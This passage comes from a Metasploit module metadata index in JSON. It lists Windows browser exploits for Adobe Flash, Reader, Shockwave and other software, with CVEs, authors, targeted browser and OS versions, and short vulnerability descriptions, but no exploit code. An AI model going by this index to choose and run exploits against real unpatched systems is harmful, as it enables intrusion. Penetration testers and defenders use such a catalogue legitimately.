"URL-http://malware.dontneedcoffee.com/2015/04/cve-2015-0359-flash-up-to-1700134-and.html",
"URL-https://git.hacklab.kr/snippets/13",
"URL-http://pastebin.com/Wj3NViUu"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_domain_memory_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_filters_type_confusion": {
"name": "Adobe Flash Player Type Confusion Remote Code Execution",
"full_name": "exploit/windows/browser/adobe_flash_filters_type_confusion",
"rank": 300,
"disclosure_date": "2013-12-10",
"type": "exploit",
"author": [
"Unknown",
"bannedit <bannedit@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a type confusion vulnerability found in the ActiveX\n component of Adobe Flash Player. This vulnerability was found exploited\n in the wild in November 2013. This module has been tested successfully\n on IE 6 to IE 10 with Flash 11.7, 11.8 and 11.9 prior to 11.9.900.170\n over Windows XP SP3 and Windows 7 SP1.",
"references": [
"CVE-2013-5331",
"OSVDB-100774",
"BID-64199",
"URL-http://helpx.adobe.com/security/products/flash-player/apsb13-28.html",
"URL-http://blog.malwaretracker.com/2014/01/cve-2013-5331-evaded-av-by-using.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_filters_type_confusion",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_mp4_cprt": {
"name": "Adobe Flash Player MP4 'cprt' Overflow",
"full_name": "exploit/windows/browser/adobe_flash_mp4_cprt",
"rank": 300,
"disclosure_date": "2012-02-15",
"type": "exploit",
"author": [
"Alexander Gavrun",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Adobe Flash\n Player. By supplying a corrupt .mp4 file loaded by Flash, it\n is possible to gain arbitrary remote code execution under the\n context of the user.\n\n This vulnerability has been exploited in the wild as part of\n the \"Iran's Oil and Nuclear Situation.doc\" e-mail attack.\n According to the advisory, 10.3.183.15 and 11.x before\n 11.1.102.62 are affected.",
"references": [
"CVE-2012-0754",
"OSVDB-79300",
"BID-52034",
"URL-http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html",
"URL-http://www.adobe.com/support/security/bulletins/apsb12-03.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3 with msvcrt ROP",
"IE 8 on Windows XP SP3 with JRE ROP",
"IE 7 on Windows Vista",
"IE 8 on Windows 7 SP1"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_mp4_cprt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_otf_font": {
"name": "Adobe Flash Player 11.3 Kern Table Parsing Integer Overflow",
"full_name": "exploit/windows/browser/adobe_flash_otf_font",
"rank": 300,
"disclosure_date": "2012-08-09",
"type": "exploit",
"author": [
"Alexander Gavrun",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in the ActiveX component of Adobe\n Flash Player before 11.3.300.271. By supplying a specially crafted .otf font file\n with a large nTables value in the 'kern' header, it is possible to trigger an\n integer overflow, which results in remote code execution under the context of the\n user. This vulnerability has also been exploited in the wild in limited targeted\n attacks. Please note in order to ensure reliability, the exploit is forced to\n modify your URIPATH parameter to less than 3 characters, which may cause possible\n URIPATH collisions.",
"references": [
"CVE-2012-1535",
"OSVDB-84607",
"BID-55009",
"URL-http://labs.alienvault.com/labs/index.php/2012/cve-2012-1535-adobe-flash-being-exploited-in-the-wild/",
"URL-https://developer.apple.com/fonts/TTRefMan/RM06/Chap6.html",
"URL-http://contagiodump.blogspot.com.es/2012/08/cve-2012-1535-samples-and-info.html",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/08/17/adobe-flash-player-exploit-cve-2012-1535-now-available-for-metasploit",
"URL-http://www.adobe.com/support/security/bulletins/apsb12-18.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 7 on Windows Vista SP2",
"IE 8 on Windows 7 SP1",
"IE 9 on Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_otf_font.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_otf_font",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_pcre": {
"name": "Adobe Flash Player PCRE Regex Vulnerability",
"full_name": "exploit/windows/browser/adobe_flash_pcre",
"rank": 300,
"disclosure_date": "2014-11-25",
"type": "exploit",
"author": [
"Mark Brand",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Adobe Flash Player. A compilation logic error\n in the PCRE engine, specifically in the handling of the \\c escape sequence when followed by\n a multi-byte UTF8 character, allows arbitrary execution of PCRE bytecode.",
"references": [
"CVE-2015-0318",
"URL-http://googleprojectzero.blogspot.com/2015/02/exploitingscve-2015-0318sinsflash.html",
"URL-https://code.google.com/p/google-security-research/issues/detail?id=199"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_pcre.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_pcre",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_regex_value": {
"name": "Adobe Flash Player Regular Expression Heap Overflow",
"full_name": "exploit/windows/browser/adobe_flash_regex_value",
"rank": 300,
"disclosure_date": "2013-02-08",
"type": "exploit",
"author": [
"Unknown",
"Boris \"dukeBarman\" Ryutin",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in the ActiveX component of Adobe\n Flash Player before 11.5.502.149. By supplying a specially crafted swf file\n with a special regex value, it is possible to trigger a memory corruption, which\n results in remote code execution under the context of the user, as exploited in\n the wild in February 2013. This module has been tested successfully with Adobe\n Flash Player 11.5 before 11.5.502.149 on Windows XP SP3 and Windows 7 SP1 before\n MS13-063, since it takes advantage of a predictable SharedUserData in order to\n leak ntdll and bypass ASLR.",
"references": [
"CVE-2013-0634",
"OSVDB-89936",
"BID-57787",
"URL-http://malwaremustdie.blogspot.ru/2013/02/cve-2013-0634-this-ladyboyle-is-not.html",
"URL-http://malware.dontneedcoffee.com/2013/03/cve-2013-0634-adobe-flash-player.html",
"URL-http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html",
"URL-http://labs.alienvault.com/labs/index.php/2013/adobe-patches-two-vulnerabilities-being-exploited-in-the-wild/",
"URL-http://eromang.zataz.com/tag/cve-2013-0634/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_regex_value.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_regex_value",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_rtmp": {
"name": "Adobe Flash Player Object Type Confusion",
"full_name": "exploit/windows/browser/adobe_flash_rtmp",
"rank": 300,
"disclosure_date": "2012-05-04",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Adobe Flash\n Player. By supplying a corrupt AMF0 \"_error\" response, it\n is possible to gain arbitrary remote code execution under\n the context of the user.\n\n This vulnerability has been exploited in the wild as part of\n the \"World Uyghur Congress Invitation.doc\" e-mail attack.\n According to the advisory, 10.3.183.19 and 11.x before\n 11.2.202.235 are affected.",
"references": [
"CVE-2012-0779",
"OSVDB-81656",
"BID-53395",
"URL-http://www.adobe.com/support/security/bulletins/apsb12-09.html",
"URL-http://contagiodump.blogspot.com.es/2012/05/may-3-cve-2012-0779-world-uyghur.html",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/06/22/the-secret-sauce-to-cve-2012-0779-adobe-flash-object-confusion-vulnerability"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3 with msvcrt ROP"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_rtmp.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_rtmp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_sps": {
"name": "Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow",
"full_name": "exploit/windows/browser/adobe_flash_sps",
"rank": 300,
"disclosure_date": "2011-08-09",
"type": "exploit",
"author": [
"Alexander Gavrun",
"Unknown",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx\n component. When processing a MP4 file (specifically the Sequence Parameter Set),\n Flash will see if pic_order_cnt_type is equal to 1, which sets the\n num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in\n offset_for_ref_frame on the stack, which allows arbitrary remote code execution\n under the context of the user. Numerous reports also indicate that this\n vulnerability has been exploited in the wild.",
"references": [
"CVE-2011-2140",
"OSVDB-74439",
"BID-49083",
"ZDI-11-276",
"URL-http://www.kahusecurity.com/2011/cve-2011-2140-caught-in-the-wild/",
"URL-http://www.adobe.com/support/security/bulletins/apsb11-21.html",
"URL-http://0x1byte.blogspot.com/2011/11/analysis-of-cve-2011-2140-adobe-flash.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3 / Vista"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_sps.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_sps",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_uncompress_zlib_uninitialized": {
"name": "Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory",
"full_name": "exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized",
"rank": 400,
"disclosure_date": "2014-11-11",
"type": "exploit",
"author": [
"Nicolas Joly",
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an uninitialized memory vulnerability in Adobe Flash Player. The\n vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails\n to initialize allocated memory. When using a correct memory layout this vulnerability\n leads to a ByteArray object corruption, which can be abused to access and corrupt memory.\n This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with\n Flash 15.0.0.189.",
"references": [
"CVE-2014-8440",
"URL-https://helpx.adobe.com/security/products/flash-player/apsb14-24.html",
"URL-http://malware.dontneedcoffee.com/2014/11/cve-2014-8440.html",
"URL-http://www.verisigninc.com/en_US/cyber-security/security-intelligence/vulnerability-reports/articles/index.xhtml?id=1081"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_uncompress_zlib_uninitialized",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_worker_byte_array_uaf": {
"name": "Adobe Flash Player ByteArray With Workers Use After Free",
"full_name": "exploit/windows/browser/adobe_flash_worker_byte_array_uaf",
"rank": 500,
"disclosure_date": "2015-02-02",
"type": "exploit",
"author": [
"Unknown",
"hdarwin",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a use-after-free vulnerability in Adobe Flash Player. The\n vulnerability occurs when the ByteArray assigned to the current ApplicationDomain\n is freed from an ActionScript worker, which can fill the memory and notify the main\n thread to corrupt the new contents. This module has been tested successfully on\n Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 16.0.0.296.",
"references": [
"CVE-2015-0313",
"URL-https://helpx.adobe.com/security/products/flash-player/apsa15-02.html",
"URL-http://hacklab.kr/flash-cve-2015-0313-%EB%B6%84%EC%84%9D/",
"URL-http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2015-0313-the-new-flash-player-zero-day/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_worker_byte_array_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flashplayer_arrayindexing": {
"name": "Adobe Flash Player AVM Verification Logic Array Indexing Code Execution",
"full_name": "exploit/windows/browser/adobe_flashplayer_arrayindexing",
"rank": 500,
"disclosure_date": "2012-06-21",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>",
"Unknown"
],
"description": "This module exploits a vulnerability in Adobe Flash Player versions 10.3.181.23\n and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification\n logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same\n vulnerability that was used for attacks against Korean based organizations.\n\n Specifically, this issue occurs when indexing an array using an arbitrary value,\n memory can be referenced and later executed. Taking advantage of this issue does not rely\n on heap spraying as the vulnerability can also be used for information leakage.\n\n Currently this exploit works for IE6, IE7, IE8, Firefox 10.2 and likely several\n other browsers under multiple Windows platforms. This exploit bypasses ASLR/DEP and\n is very reliable.",
"references": [
"CVE-2011-2110",
"OSVDB-73007",
"BID-48268",
"URL-http://www.adobe.com/devnet/swf.html",
"URL-http://www.adobe.com/support/security/bulletins/apsb11-18.html",
"URL-http://www.accessroot.com/arteam/site/download.php?view.331",
"URL-http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20110617"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flashplayer_arrayindexing",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flashplayer_avm": {
"name": "Adobe Flash Player AVM Bytecode Verification Vulnerability",
"full_name": "exploit/windows/browser/adobe_flashplayer_avm",
"rank": 400,
"disclosure_date": "2011-03-15",
"type": "exploit",
"author": [
"bannedit <bannedit@metasploit.com>",
"Unknown"
],
"description": "This module exploits a vulnerability in Adobe Flash Player versions 10.2.152.33\n and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification\n logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same\n vulnerability that was used for the RSA attack in March 2011.\n\n Specifically, this issue results in uninitialized memory being referenced and later\n executed. Taking advantage of this issue relies on heap spraying and controlling the\n uninitialized memory.\n\n Currently this exploit works for IE6, IE7, and Firefox 3.6 and likely several\n other browsers. DEP does catch the exploit and causes it to fail. Due to the nature\n of the uninitialized memory it's fairly difficult to get around this restriction.",
"references": [
"CVE-2011-0609",
"OSVDB-71254",
"URL-http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html",
"URL-http://www.adobe.com/devnet/swf.html",
"URL-http://www.adobe.com/support/security/advisories/apsa11-01.html",
"URL-http://www.f-secure.com/weblog/archives/00002226.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_flashplayer_avm.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flashplayer_avm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flashplayer_flash10o": {
"name": "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",
"full_name": "exploit/windows/browser/adobe_flashplayer_flash10o",
"rank": 300,
"disclosure_date": "2011-04-11",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in Adobe Flash Player that was discovered,\n and has been exploited actively in the wild. By embedding a specially crafted .swf\n file, Adobe Flash crashes due to an invalid use of an object type, which allows\n attackers to overwrite a pointer in memory, and results in arbitrary code execution.\n Please note for IE 8 targets, Java Runtime Environment must be available on the\n victim machine in order to work properly.",
"references": [
"CVE-2011-0611",
"OSVDB-71686",
"BID-47314",
"URL-http://www.adobe.com/support/security/bulletins/apsb11-07.html",
"URL-http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx",
"URL-http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html",
"URL-http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html",
"URL-http://secunia.com/blog/210"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 7 on Windows Vista",
"IE 8 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flashplayer_flash10o",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flashplayer_newfunction": {
"name": "Adobe Flash Player \"newfunction\" Invalid Pointer Use",
"full_name": "exploit/windows/browser/adobe_flashplayer_newfunction",
"rank": 300,
"disclosure_date": "2010-06-04",
"type": "exploit",
"author": [
"Unknown",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the DoABC tag handling within\n versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also\n vulnerable, as are any other applications that may embed Flash player.\n\n Arbitrary code execution is achieved by embedding a specially crafted Flash\n movie into a PDF document. An AcroJS heap spray is used in order to ensure\n that the memory used by the invalid pointer issue is controlled.\n\n NOTE: This module uses a similar DEP bypass method to that used within the\n adobe_libtiff module. This method is unlikely to work across various\n Windows versions due to a hardcoded syscall number.",
"references": [
"CVE-2010-1297",
"OSVDB-65141",
"BID-40586",
"URL-http://www.adobe.com/support/security/advisories/apsa10-01.html",
"URL-http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flashplayer_newfunction",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flatedecode_predictor02": {
"name": "Adobe FlateDecode Stream Predictor 02 Integer Overflow",
"full_name": "exploit/windows/browser/adobe_flatedecode_predictor02",
"rank": 400,
"disclosure_date": "2009-10-08",
"type": "exploit",
"author": [
"unknown",
"jduck <jduck@metasploit.com>",
"jabra"
],
"description": "This module exploits an integer overflow vulnerability in Adobe Reader and Adobe\n Acrobat Professional versions before 9.2.",
"references": [
"CVE-2009-3459",
"BID-36600",
"OSVDB-58729",
"URL-http://blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html",
"URL-http://www.adobe.com/support/security/bulletins/apsb09-15.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader Windows Universal (JS Heap Spray)"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flatedecode_predictor02",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_geticon": {
"name": "Adobe Collab.getIcon() Buffer Overflow",
"full_name": "exploit/windows/browser/adobe_geticon",
"rank": 400,
"disclosure_date": "2009-03-24",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"Didier Stevens <didier.stevens@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.\n Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially\n crafted pdf that contains a malformed Collab.getIcon() call, an attacker may\n be able to execute arbitrary code.",
"references": [
"CVE-2009-0927",
"OSVDB-53647",
"ZDI-09-014",
"URL-http://www.adobe.com/support/security/bulletins/apsb09-04.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader Universal (JS Heap Spray)"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/adobe_geticon.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_geticon",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_jbig2decode": {
"name": "Adobe JBIG2Decode Heap Corruption",
"full_name": "exploit/windows/browser/adobe_jbig2decode",
"rank": 400,
"disclosure_date": "2009-02-19",
"type": "exploit",
"author": [
"natron <natron@metasploit.com>",
"xort",
"redsand",
"MC <mc@metasploit.com>",
"Didier Stevens <didier.stevens@gmail.com>"
],
"description": "This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.\n This module relies upon javascript for the heap spray.",
"references": [
"CVE-2009-0658",
"OSVDB-52073",
"URL-http://www.adobe.com/support/security/bulletins/apsb09-04.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader v9.0.0 (Windows XP SP3 English)",
"Adobe Reader v8.1.2 (Windows XP SP2 English)"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/adobe_jbig2decode.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_jbig2decode",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_media_newplayer": {
"name": "Adobe Doc.media.newPlayer Use After Free Vulnerability",
"full_name": "exploit/windows/browser/adobe_media_newplayer",
"rank": 400,
"disclosure_date": "2009-12-14",
"type": "exploit",
"author": [
"unknown",
"hdm <x@hdm.io>",
"pusscat <pusscat@metasploit.com>",
"jduck <jduck@metasploit.com>",
"jabra"
],
"description": "This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat\n Professional versions up to and including 9.2.",
"references": [
"CVE-2009-4324",
"BID-37331",
"OSVDB-60980",
"URL-http://www.adobe.com/support/security/bulletins/apsb10-02.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader Windows English (JS Heap Spray)",
"Adobe Reader Windows German (JS Heap Spray)"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/adobe_media_newplayer.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_media_newplayer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_shockwave_rcsl_corruption": {
"name": "Adobe Shockwave rcsL Memory Corruption",
"full_name": "exploit/windows/browser/adobe_shockwave_rcsl_corruption",
"rank": 300,
"disclosure_date": "2010-10-21",
"type": "exploit",
"author": [
"David Kennedy \"ReL1K\" <kennedyd013@gmail.com>"
],
"description": "This module exploits a weakness in the Adobe Shockwave player's handling of\n Director movies (.DIR). A memory corruption vulnerability occurs through an undocumented\n rcsL chunk.",
"references": [
"CVE-2010-3653",
"OSVDB-68803",
"URL-http://www.adobe.com/support/security/bulletins/apsb10-25.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_shockwave_rcsl_corruption",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_toolbutton": {
"name": "Adobe Reader ToolButton Use After Free",
"full_name": "exploit/windows/browser/adobe_toolbutton",
"rank": 300,
"disclosure_date": "2013-08-08",
"type": "exploit",
"author": [
"Soroush Dalili",
"Unknown",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a use after free condition on Adobe Reader versions 11.0.2, 10.1.6\n and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where\n the cEnable callback can be used to free the object memory early. Later use of the object\n allows triggering the use after free condition. This module has been tested successfully\n on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in\n November, 2013. At the moment, this module doesn't support Adobe Reader 9 targets; in order\n to exploit Adobe Reader 9 the fileformat version of the exploit can be used.",
"references": [
"CVE-2013-3346",
"OSVDB-96745",
"ZDI-13-212",
"URL-http://www.adobe.com/support/security/bulletins/apsb13-15.html",
"URL-http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP / IE / Adobe Reader 10/11"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_toolbutton.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_toolbutton",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_utilprintf": {
"name": "Adobe util.printf() Buffer Overflow",
"full_name": "exploit/windows/browser/adobe_utilprintf",
"rank": 400,
"disclosure_date": "2008-02-08",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"Didier Stevens <didier.stevens@gmail.com>"
],
"description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional\n < 8.1.3. By creating a specially crafted pdf that contains a malformed util.printf()\n entry, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-2992",
"OSVDB-49520"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader v8.1.2 (Windows XP SP3 English)"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/adobe_utilprintf.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_utilprintf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/advantech_webaccess_dvs_getcolor": {
"name": "Advantech WebAccess dvs.ocx GetColor Buffer Overflow",
"full_name": "exploit/windows/browser/advantech_webaccess_dvs_getcolor",
"rank": 300,
"disclosure_date": "2014-07-17",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability in Advantech WebAccess. The\n vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to\n sprintf can be reached with user controlled data through the GetColor function.\n This module has been tested successfully on Windows XP SP3 with IE6 and Windows\n 7 SP1 with IE8 and IE 9.",
"references": [
"CVE-2014-2364",
"ZDI-14-255",
"URL-http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb",
"is_install_path": true,
"ref_name": "windows/browser/advantech_webaccess_dvs_getcolor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/aim_goaway": {
"name": "AOL Instant Messenger goaway Overflow",
"full_name": "exploit/windows/browser/aim_goaway",
"rank": 500,
"disclosure_date": "2004-08-09",
"type": "exploit",
"author": [
